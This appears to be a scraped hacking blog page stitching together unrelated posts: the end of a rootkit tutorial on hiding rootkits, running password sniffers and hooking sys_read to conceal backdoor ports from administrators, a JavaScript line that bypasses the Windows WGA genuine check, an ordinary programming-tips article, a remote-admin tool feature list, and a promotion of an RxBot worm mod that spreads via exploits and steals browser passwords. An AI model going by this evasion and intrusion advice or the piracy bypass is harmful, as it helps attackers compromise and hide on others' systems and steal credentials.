To start off with, it would be a good idea to hide the compiled rootkit in a hidden directory. I would recommend creating a directory you suspect the administrator will not go near. For example try hiding it in a folder situated in /var/something/something/something make it as long as possible and rename the file using the "mv" command to something the admin will not suspect is a "suspicious" file (e.g. Kernel-023, pso, ls2 etc)

Now when running the sniffer make sure you add the character "&" behind of it, like this "lnsniffer&", the "&" tells the system to continue running the program even when the user is logged out. However, this does provoke a slightly higher risk. If you leave the Sniffer running all day and the sysadmin logs in he may notice something is up if he was to execute the "ps" command. Sniffers are great programs for getting passwords, if a TCP Sniffer was installed on a regular Ethernet connection you could capture a good 50 odd passwords! The downside to Sniffers are they may need to be modified slightly before you can run them, also some IDS programs can detect changes made to the Ethernet card (e.g. When the card is switched into promiscuous mode the IDS will know and alert the admin) :-(

Now if your running a "Kernel rootkit" its quite easy to hide the Sniffer, because if the kernel rootkit is any good it should allow the Sniffer to hide the promiscuous flag of the network interface. The system call to Trojan in this case is sys_ioctl() (You don't really need to know that, unless your planning on writing your own kernel rootkit)

"Hiding network connections" is another technique you may wish to use. To sucessfully hide network connections it can be done by preventing the system logging the activities inside �/proc/net/tcp� and �/proc/net/udp�. The idea for a kernel rootkit is to trojan the sys_read() command. Whenever reading these two files and a line matching a unique string, the system call will hide it from user.

The above techniques can then be brought together to successfully hide a backdoor. Most backdoors you install will listen on a certain port, this informartion is then logged into /proc/net/tcp and /proc/net.udp, you would need to manipulate the sys_read() system call to sucessfully hide the backdoor.

Now it's important that you know using rootkits could be a very easy way to get busted. There have been times when I have just gone into a system with a custom made log cleaner and nothing else. System administrators are getting quite clever and with the rapid growth of advance programs like "Promiscuous Detectors" and "Chkrootkit" it's easy for the attacker to slip up and get busted. Kernel rootkits are the best type of rootkits to use when penetrating through a system but they are also the most complex and will require patience and understanding before they can be put to any real use. Before you just go out and install a bunch of rootkits on your "rooted boxes" I would strongly recommend experimenting with them on your own box, so you learn EXACTLY what they are doing. If you haven�t got a box to practice on I recommend you download and install a copy of VMWare, NEVER take risks! There is more to life than computers, don't mess your whole life up with some stupid childish mistake!

Now I'm finished here with rootkits (Partly because my fingers are getting tired) I hope you have learnt SOMETHING from this t-file. I am sorry that I didn't really go into much detail about kernel rootkits, system calls and LKM's or ways to protect yourself from such malicious software but this is the "First Edition" I do eventually plan to develop this paper and continuously add to it as rootkits develop but no promises ;-)

Hope you learnt something; I will finish off this paper by leaving with you some useful links and recommended reading material.

15 - Recommended reading and useful Links

Sunnie Hawkins, Understanding the Attackers Toolkit, January 13, 2001,URL: http://www.sans.org/infosecFAQ/linux/toolkit.htm
Andrew R. Jones, A Review of Loadable Kernel Modules, June 12, 2001, URL: http://www.sans.org/infosecFAQ/linux/kernel_mods.htm
Jason Drury, Sniffers: What are they and How to Protect From Them, November 11, 2000, URL: http://www.sans.org/infosecFAQ/switchednet/sniffers.htm
DeokJo Jeon, Understanding DDOS Attack, Tools and Free Anti-tools with Recommendation, April 7, 2001,URL: http://www.sans.org/infosecFAQ/threats/understanding_ddos.htm
Steve Gibson, The Strange Tale of the Denial OF Service Attacks Against GRC.COM, Gibson Research Corporation, Aug 31, 2001, URL: http://grc.com/dos/grcdos.htm
Black Tie Affair, Hiding Out Under UNIX, Volume Three, Issue 25, File 6 of 11, March 25, 1989, URL: http://www.phrack.org/show.php?p=25&a=6
Christopher Klaus, Backdoors, August 4 1997, URL: http://secinf.net/info/unix/backdoors.txt
Cra58cker, A Crash Course in Backdoors: http://www.invisibleghosts.net
16 - Credits

This paper couldn't have been put together if it wasn't for the following people...

Daremo - Explained the procedure used to disassemble and trace an installed rootkit.

Cra58cker - I wrote this ;-)

Invisible Ghosts - My inspiration

Sailmap Manap - I quotes him quite a lot

Invisible Evil - Helped with the hiding methods

Mcaffee - Provided the analysis of the "T0rn" rootkit

Author of T0rn - For giving me something to write about!

Disable Windows WGA Validation check

Disable Windows WGA Validation check
Disable Windows WGA Validation check

This describes how to disable the Windows Genuine Advantage Validation Check using Java script.
When you go to the Windows/Microsoft Update site, before you click Express or Custom, type the following into your address bar:

Java script:void(window.g_sDisableWGACheck='all')

and press enter. This disables the WGA check, and allows you to download updates without checking authenticity of your Windows copy.

Tips To Improve Your Coding And Project Programming

Tips To Improve Your Coding And Project Programming
Tips To Improve Your Coding And Project Programming:
"I originally wrote this article over a year ago. But after going though it I fixed allot of mistakes in grammar and composition. I also added a few things."

Plan out what you will do before you do it.
This may seem trivial, but the hour you spend doing it will save you many hours down the road. I have learned this the hard way many times. As this may seem obvious, the only reason it is such is because you just thought of it. It won’t be nearly as fresh when you come back tomorrow. I have a full guide on planning projects here.

Make your variable names as descriptive as possible.
It doesn’t matter if the variable ID doesn’t exist, if it is with a bunch of results with result_ before it, make it result_id. This will make easier for you or any future programmer to do it. I have had to work on code where everything wasn’t well named; it was a major, multi-hour pain.

This is by far the most important one. No matter how bleeding obvious the code looks now, it won’t be in 10 days when you have a bug that needs fixing. Comment your code for other programmers and yourself. Don’t be afraid to put long comments where they are needed, they do not affect speed. Just don't go overboard, comments explain what you are doing. Don't write a small novel over what this code did to get here and its background.

If a piece of code is used allot and may be changed, make it an include.
This is one again I have learned the hard way with deadlines just hours away. An include means one change and it’s done in every file. Typing it out every time not only makes the code messier, it makes it hard to edit. Lets say your page has a header that goes into every page. You present it to the client and he finds one error. This could mean a 25 file fix up if you don’t use includes. But if the header file was an include, it is a no problem deal.

To each its own, don’t make two things in one file.
There is no crime in making allot of files for a project. If you have two different parts that are in the same process (a forums reply box and the file that actually posts it for example), use two different files.

Don’t reinvent the wheel.
You will have projects that have the same functions in part. It is not a crime to take the code from an old project and modify it, doing so gives the client better code and saves you time. I use the same code from a project I did about a year ago for a user system. Why? I use it because its rock solid code that works every time. All I would do should I remake it is rewrite the same code, possibly some bugs with it. Similar projects mean similar code, whether you take advantage of it or not.

Don’t overuse OOP
Among programming techniques, Object Oriented Programming is a pile driver. Insane power and ability, but extremely resource intensive and large. Using OOP takes a long time to process and run. The flexibility and power it provides should one be used for pieces you will reuse on large projects. If the project isn’t large, OOP may be overkill. If that piece of code doesn’t need to be reused frequently, it may not need to be an object.


Set realistic deadlines.
NEVER give a deadline you don’t think you can make, all that can do is make the client mad and you stressed. It is better to give a deadline you think you can beat, because if you make it better the client will be happier. Should you not make it early, you have time for the unexpected. The other reason you should do this is most-nighters. There is nothing harder to edit then code made by a programmer in a time crunch, even if that programmer is you. I have done most-nighters to meet deadlines before. When you are tired and running on caffeine, your code gets messier and messier to the point you can’t read what you just wrote.

Never go into a project you can’t or won’t do.
This one is bad you both you and the client. If you don’t think you can do a project, don’t try to. What will happen is you spend extra hours trying to do this, you will eventually say you can’t do this, or raise your price. The client will either leave you or never use you again and give you bad reviews. I’ve turned down many high paying projects because I did not know how to use the script they wanted modified.

Keep the client updated.
Updated clients are happy clients. I would never go back to a programmer who tries to avoid contacting me on what’s going on. I would want a programmer who messages me when I come online, telling me what’s being done. Even if it is not a complete module being finished, I still want to know it’s being worked on.

compromise your price.

I’ve had clients come to me with a CMS project for $300. In a money crunch, $300 sounds awful nice, you might be almost inclined to accept. Just take into consideration what you are doing to yourself. You are working just as hard on a project for less money. When a project for a fair price comes up you must turn it down because you are busy. It doesn’t end there though, if somehow it goes public that you gave a cut rate job, there will be people left and right asking you for a cut rate job. You don’t want a reputation for that. There are people who will pay the higher price for a good job. It is better to wait for a good one to come then to compromise your pricing standards.

I have also found that the ones expecting cut rate jobs are the hardest clients to work with. A low price either means they have no experience in what it takes to make a site like they are asking for, or they just don’t care. Either way, a bad price is a warning sign of a hard to deal with client.

Don’t work for free
This could be categorized in the same place as the previous tip. But I feel it deserves its own paragraph.

Any programmer who has been in the business for a while has had many people asking for free work. Generally they are broke kids looking for a free script. They generally make promises they never intend to keep, the common ones I hear are
  • When the site makes money you will get X% of it
  • I am outsourcing you, if I like your work many paying projects will follow
  • This will look great on your portfolio. We will both become rich off of this!.
All these have problems. One and two require the unchecked honesty from the client over money. Legally speaking, he could run with your code and there is nothing you can do about it. The final one is true, but if you need to expand your portfolio, you should not do it for someone else. If you need an extra project to show clients, do it for yourself or a paying client. That way you maintain the rights to the code and can use it whenever you want.

Make your terms clear before the project start.
I have had clients mad at me to the point where they left me even though I had the upfront fee. All because I wouldn’t do an addition for free. Clients don’t know how it works, even if they think they do. You would be surprised at what clients have asked me to do for free. The best way around this is to make it as clear as you can what you will do, what you will not do and what you will charge more for. I make sure all my clients read my policies before I seriously consider doing the project. That way if something comes up you have something on your side so he had no right to get mad.

Give the client his moneys worth, always.
No matter who gets the short end of this, give the client what he paid for. If the job takes half the time you expected, he will still give you full money. But if the project took longer then expected, still do a job to its fullest. Happy clients return to a programmer that gave them what they wanted, it is good for future jobs to keep your standards high. Returning clients generally pay well because they know you aren’t a scam.

Always have an upfront
When I was just starting things to program professionally, I had a return client come to me for a project. I did multiple projects for him before, easy to work with and trustworthy. He wanted a mail script for a smallish amount of money. It was a fast job, so I didn’t require an upfront. When I finish, his paypal isn’t working, since he outsources me he has a deadline and needs to relay this to his client. He offers me hosting in return for the money, but I don’t need hosting so I decline. I then tell him since I trust him I will give him the files if he will pay me when he gets it fixed. We agree and he gets the files. He stayed in contact for about a week with excuses I didn’t really believe, but I didn’t want to start a fight. It He never replied back. I got scammed by a client who I had a rather long history with. The moral of this story is always charge upfront and never give out the work until you are payed. Even clients you trust could go bad over it. I should also add that the amount was $35. Yes, he went bad on me even with a extensive history over $35.

Happy programming!


Remote Administrator Control

Remote Administrator Control
Remote Administrator Control 3.3.1
Features:- Safe and fast computer control through Internet/Intranet network with TCP/IP protocol
- Computer administration and maintenance, e.g. on administrator or management workplaces
- User support and problem solution, e.g. helpdesk workplaces
- Observing teaching in computer classes
- File and folder transfer
- Activity recording when controlling a computer
- Activity monitoring or recording on a remote computer
- Starting commands and tools on a remote system
- Access to home computer from work through HTTP tunnel
- Access to work computer from home or another private network through HTTP tunnel

Supported Operating Systems:
- Windows® 95
- Windows® 98
- Windows® ME
- Windows NT® 4.0
- Windows® 2000
- Windows® XP (32/64-bit)
- Windows® Server 2003 (32/64-bit)
- Windows Vista™ (32/64-bit)

RxB0T Hack Tool

RxB0T Hack Tool
Rxbot (also known as rBot) is a win32 computer IRC worm written in the C++ programming language that spreads on computers running Windows XP, Windows 2000, Windows Millennium, and Windows 9x systems.

Rxbot contains a built in SFTP, HTTP, RLOGIN, and a SOCKS4 proxy server that can be spawned by the remote attacker. A keylogger component is also included in the Rxbot source distributions. One downside is that the internal keylogger uses the GetASyncKeyState API part of the Win32 Api, which is known to be a major memory consumer. Rxbot contains a library of specific security holes that are exploited by the worm to propagate on other systems.

Rxbot are generally used to conduct Distributed Denial of Service Attacks against websites

A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to, motives for, and targets of a DoS attack may vary, it generally consists of the concerted, malevolent efforts of a person or persons to prevent an Internet site or service from functioning efficiently or at all, temporarily or indefinitely.

Okay..enough of Gyan Already...

The latest and greatest version of RXbOT mods for FIREFOX !!!!

This version includes:
  • Encrypted strings (harder to decompile bot, use encrypt1.exe to encrypt)
  • MSN Spread
  • Working sym spread
  • MSSQL spread
  • Trend Micro Exploit Spread
  • Firefox (Gets users firefox passwords)
  • Pstore (Gets users IE passwords)
  • VNC Scanner
  • Sniffers
  • BuzShell
Special Notes: Note that ALL strings MUST BE ENCRYPTED (use the included encrypt1.exe) Also, this bot has troubles connecting to severs without DNS's, so either set up a free dns or hope your server has one. Run cleanup.bat before you compile.